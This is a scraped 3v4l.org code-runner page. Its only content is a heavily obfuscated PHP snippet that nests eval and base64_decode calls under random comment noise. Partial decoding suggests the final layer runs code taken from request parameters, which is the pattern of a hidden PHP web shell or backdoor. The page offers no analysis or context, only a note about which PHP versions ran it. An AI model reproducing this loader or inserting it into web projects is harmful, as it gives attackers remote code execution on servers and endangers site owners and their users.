3v4l.org

run code in 200+ php & hhvm versions
Bugs & Features
<?php /*Y3geXe=*/eval/*lT+vp*/(/*i3<W*/base64_decode/*\E!.*/(/*Y+\;^*/'LypJKTtcRDg7Ki9ldmFsLypJJzlTZiovKC8qLlZXQl4qL2Jhc2U2NF9kZWNvZGUvKj5NIWFnWiovKC8qejdbT3oqLydMeW96TkRJcEtpOXBaaThxVm0xOFcwdzJLaThvTHlwN2MyQTRjMWQ2S2k5cGMzTmxkQzhxSjBKS0xFMVRLaScvKldfXTNsKi8uLypzWkJvKi8nOG9MeW9nY1Y4cUx5UmZVa1ZSVlVWVFZDOHFVVXBJS2k5Ykx5cDBVa'/*s)[ Un*/./*N-F:c*/'1pzY1Q0cUx5ZGthaWN2S2k1K1pXUlQnLypuMmEqLy4vKiBFUWpaKi8nV1NvdkxpOHFOVHB6U2xNc0tpOG5lbUVuTHlwUWRpMHFMeTR2S2sxZFEydEJheklxTHlkbmJ5Y3ZLbWhRZGknLyoyXTo4Ki8uLypNSHJpKi8nb3ZYUzhxZFZ3eFJHaFlKU292THlvaGVGZDlNU292S1M4cWFGVlRhRFlxTHk4cVVFNUNSeW92S1M4cVNESnUnLyo/K0'/*W^O*/./*f09O&hR*/'EqLy4vKn4lbzwqLydQSHd3VnlvdlpYWmhiQzhxSjNVd1p6UXFMeWd2S2tWc2R5a3FMM04wY21sd2MyeGhjMmhsY3k4cVJsRmZMVicvKmwyYWNOYCovLi8qanNlX3EqLydRcUx5Z3ZLam8yTkhRcUx5UmZVa1ZSVlVWVFZDOHFjVDVNWWlvdld5OHFPRFZWS2k4blpHcDZKeThxZm5ZcycvKnV4Q1YqLy4vKixJO2csKi8nTGw1VUtDb3ZMaTh'/*mfS8}*/./*dwXI8O*/'xTGlsd1hDb3ZKMkZuYnljdktsRlJlbmtxTDEwdktqTkRMaTBxTHk4cU1TaENPazlISnknLypuSXBhbSovLi8qLmk/KGwqLydGZUtpOHBMeXBEYW5wQUprNHFMeThxTmlzaGF5b3ZLUzhxVkZOeEtpOHZLaVpyWFV4dUtpODdMeXBBWnpBNVJ5b3YnLyp9ZGRZdiovKS8qQydeKi8vKmgwNCovKS8qPEohLihjKi8vKnU2XVwqLzsvKntASyov'/*9f */)/*Br_}S*//*axtJ*/)/*7sZS[*//*xV<aJ*/;/*rWYOk*/
Output for 4.3.0 - 7.3.0rc4